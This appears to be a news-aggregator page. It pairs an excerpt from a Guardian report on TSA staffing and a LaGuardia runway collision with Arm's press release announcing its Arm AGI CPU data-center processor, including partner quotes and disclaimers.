Adam Stahl, the acting TSA deputy administrator, told Fox News that ICE agents would be “conducting non-specialized security support — manning the exit lanes, crowd management, line control … to help alleviate the challenges that our officers are facing”.
Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work without pay amid the shutdown. The shutdown stems from the US Senate not funding the TSA’s parent agency in a dispute over immigration enforcement reforms.
Sean Duffy, the US transportation secretary, on Monday declined to say how many controllers were on duty at LaGuardia when Sunday’s crash happened, deferring instead to the ongoing NTSB investigation.
But he denied rumors that the tower had only one controller on duty. He said LaGuardia was “very well staffed”, with 33 certified controllers and more in training. He said the goal was to have 37 on staff.
Sunday’s incident was not the only collision at LaGuardia in recent months. In October, two Delta jets collided on a taxiway, sending one person to a hospital.
In July 2024, a co-pilot reported a similar near-collision after controllers said a plane was cleared to cross the runway even though another aircraft was landing at the same time.
“Ground control issued a stop command just in time,” the report entry said.
...
Read the original on www.theguardian.com »
...
Read the original on www.githubstatus.com »
Today, Arm is announcing the Arm AGI CPU, a new class of production-ready silicon built on the Arm Neoverse platform and designed to power the next generation of AI infrastructure.
For the first time in our more than 35-year history, Arm is delivering its own silicon products — extending the Arm Neoverse platform beyond IP and Arm Compute Subsystems (CSS) to give customers greater choice in how they deploy Arm compute — from building custom silicon to integrating platform-level solutions or deploying Arm-designed processors. It reflects both the rapid evolution of AI infrastructure and growing demand from the ecosystem for production-ready Arm platforms that can be deployed at pace and scale.
AI systems are increasingly operating continuously at global scale. Historically, the human was the bottleneck in computing — the pace at which people could interact with systems defined how quickly work could move through them. In the era of agentic AI, that constraint disappears as software agents coordinate tasks, interact with multiple models and make decisions in real time.
As AI systems run continuously and workloads grow in complexity, the CPU becomes the pacing element of modern infrastructure — responsible for keeping distributed AI systems operating efficiently at scale. In a modern-day AI data center, the CPU manages thousands of distributed tasks — orchestrating accelerators, managing memory and storage, scheduling workloads and moving data across systems — and now, with agentic AI, coordinating fan-out across large numbers of agents.
This shift places new demands on the CPU and that requires an evolution of the processor.
Arm Neoverse already underpins many of today’s leading hyperscale and AI platforms, including AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI infrastructure scales globally, partners across the ecosystem are asking Arm to do more. The Arm AGI CPU was created to address this shift.
Agentic AI workloads demand sustained performance at massive scale. The Arm AGI CPU is designed to deliver high per-task performance at sustained load across thousands of cores in parallel — all within the power and cooling limits of modern data centers.
Every element of the Arm AGI CPU — from operating frequency to memory and I/O architecture — has been designed to support massively parallel, high-performance agentic workloads in a densely populated rack deployment.
Arm’s reference server configuration is a 1OU, 2-node design — packing in two chips with dedicated memory and I/O for a total of 272 cores per blade. These blades are designed to fully populate a standard air-cooled 36kW rack — 30 blades delivering a total of 8160 cores. Arm has additionally partnered with Supermicro on a liquid-cooled 200kW design capable of housing 336 Arm AGI CPUs for over 45,000 cores.
In this configuration, the Arm AGI CPU is capable of delivering more than 2x the performance per rack compared to the latest x86 systems*, achieved through the fundamental advantages of the Arm architecture and careful matching of system resources to compute:
* Arm AGI CPU’s class-leading memory bandwidth means more effective threads of execution per rack; x86 CPUs degrade as cores contend under sustained load.
* High performance, efficient, single-threaded Arm Neoverse V3 CPU cores outperform legacy architectures; every Arm thread does more work.
* More usable threads and more work-per-thread compounds to massive performance gains per rack.
The Arm AGI CPU is already seeing strong commercial momentum with partners at the forefront of scaling agentic AI infrastructure. Planned deployments span accelerator management, agentic orchestration and the densification of services, applications and tools needed for agentic task scale-out — as well as increased networking and data plane compute to support the AI data center.
Meta is our lead partner and customer, co-developing the Arm AGI CPU to optimize gigawatt-scale infrastructure for its Meta family of apps and to work alongside Meta’s own custom MTIA accelerators. Other launch partners include Cerebras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each working with Arm on the deployment of the Arm AGI CPU to accelerate AI-driven services across cloud, networking and enterprise environments. Commercial systems are now available for order from ASRockRack, Lenovo and Supermicro.
To accelerate adoption further, Arm is introducing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS standard form factor server. Arm plans to contribute this reference server design and supporting firmware, along with further contributions including system architecture specifications, debug frameworks and diagnostic and verification tooling applicable to all Arm-based systems. Further details will come at the upcoming OCP EMEA Summit.
The launch of Arm AGI CPU represents a new chapter in Arm’s data center journey and continued leadership in computing innovation. As AI reshapes the industry, Arm remains committed to enabling progress across the ecosystem — meeting customers where they are, from hyperscale cloud providers to AI startups.
The Arm AGI CPU is the first offering of Arm’s new data center silicon product line and is available to order now. Follow-on products are committed, targeting best-in-class performance, scale and efficiency. This continues in parallel with the Arm Neoverse CSS product roadmap so that all Arm data center customers move forward together on platform architecture and software compatibility.
Entering this new chapter, our mission remains unchanged: to provide the compute foundation that enables innovation across industries. And the ecosystem is fully behind us: More than 50 leading companies across hyperscale, cloud, silicon, memory, networking, software, system design and manufacturing are supporting the expansion of the Arm compute platform into silicon. With Arm AGI CPU, we are not only defining the architecture of the AI-native data center, we are building it.
Hear more from our Arm AGI CPU deployment partners:
“At Cerebras we build AI infrastructure designed for ultra-fast, large-scale inference, and as this becomes the dominant workload in AI, composable, high-performance systems matter more than ever — these systems need purpose-built AI acceleration alongside efficient, scalable CPUs orchestrating data movement, networking, and coordination at scale. Extending the Arm compute platform into AGI-class infrastructure is a positive step for the ecosystem and for customers deploying AI at global scale.” — Andrew Feldman, CEO, Cerebras
“To continue our mission of helping build a better Internet, Cloudflare needs infrastructure that scales efficiently across our global network. The Arm AGI CPU provides high-performance, energy-efficient compute designed for the next generation of workloads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare
“Delivering AI experiences at global scale demands a robust and adaptable portfolio of custom silicon solutions, purpose-built to accelerate AI workloads and optimize performance across Meta’s platforms. We worked alongside Arm to develop the Arm AGI CPU to deploy an efficient compute platform that significantly improves our data center performance density and supports a multi-generation roadmap for our evolving AI systems.” — Santosh Janardhan, Head of Infrastructure, Meta
“OpenAI runs AI systems at massive scale. Hundreds of millions use ChatGPT every day, businesses build on our API, and developers rely on tools like Codex. The Arm AGI CPU will play an important role in our infrastructure as we scale, strengthening the orchestration layer that coordinates large scale AI workloads and improving efficiency, performance, and bandwidth across the system.” — Sachin Katti, Head of Industrial Compute at OpenAI
“At Positron, we are focused on purpose-built inference accelerators that delivers breakthrough token generation efficiency using commodity memory. Arm has consistently delivered the industry’s most power-efficient compute platforms, which makes the Arm AGI CPU a natural foundation for next-generation AI infrastructure. By combining Positron’s inference acceleration technology with the energy-efficient Arm AGI CPU platform, we see a powerful opportunity to help data center operators deploy frontier AI models at scale with greater performance per watt and per dollar.” — Mitesh Agrawal, CEO, Positron AI
“High-performance AI systems require tight coordination between general-purpose compute and accelerator architectures. By combining the Arm AGI CPU with Rebellions’ NPUs in new high-density server configurations — we’re delivering a scalable, energy efficient platform that is optimized for AI inference workloads at scale.” — Marshall Choy, Chief Business Officer, Rebellions
“SAP’s successful deployment of SAP HANA on Arm-based AWS Graviton underscores the maturity and performance of the Arm ecosystem for enterprise workloads. The Arm AGI CPU extends that opportunity, providing scalable, efficient compute designed to support the next generation of AI-powered business solutions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP
“SK Telecom is expanding into large-scale, full-stack AI inference data center infrastructure, which includes Arm AGI CPU and Rebellions AI accelerator chip. By bringing together our sovereign A.X foundation model with inference-optimized AI servers, we are ready to deliver it to world while elevating our AIDC competitiveness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom
This blog post contains forward-looking statements regarding Arm’s product roadmap, future performance, planned contributions and partner deployments. These statements are based on current expectations and are subject to risks and uncertainties that could cause actual results to differ materially. For a discussion of factors that could affect Arm’s results, please refer to Arm’s filings with the U.S. Securities and Exchange Commission.
Performance claims are based on Arm internal estimates comparing a fully populated rack of Arm AGI CPU-based servers against comparable x86-based server configurations using industry-standard workloads. Actual results may vary based on system configuration, workload, and other factors.
All product and company names are trademarks or registered trademarks of their respective holders.
...
Read the original on newsroom.arm.com »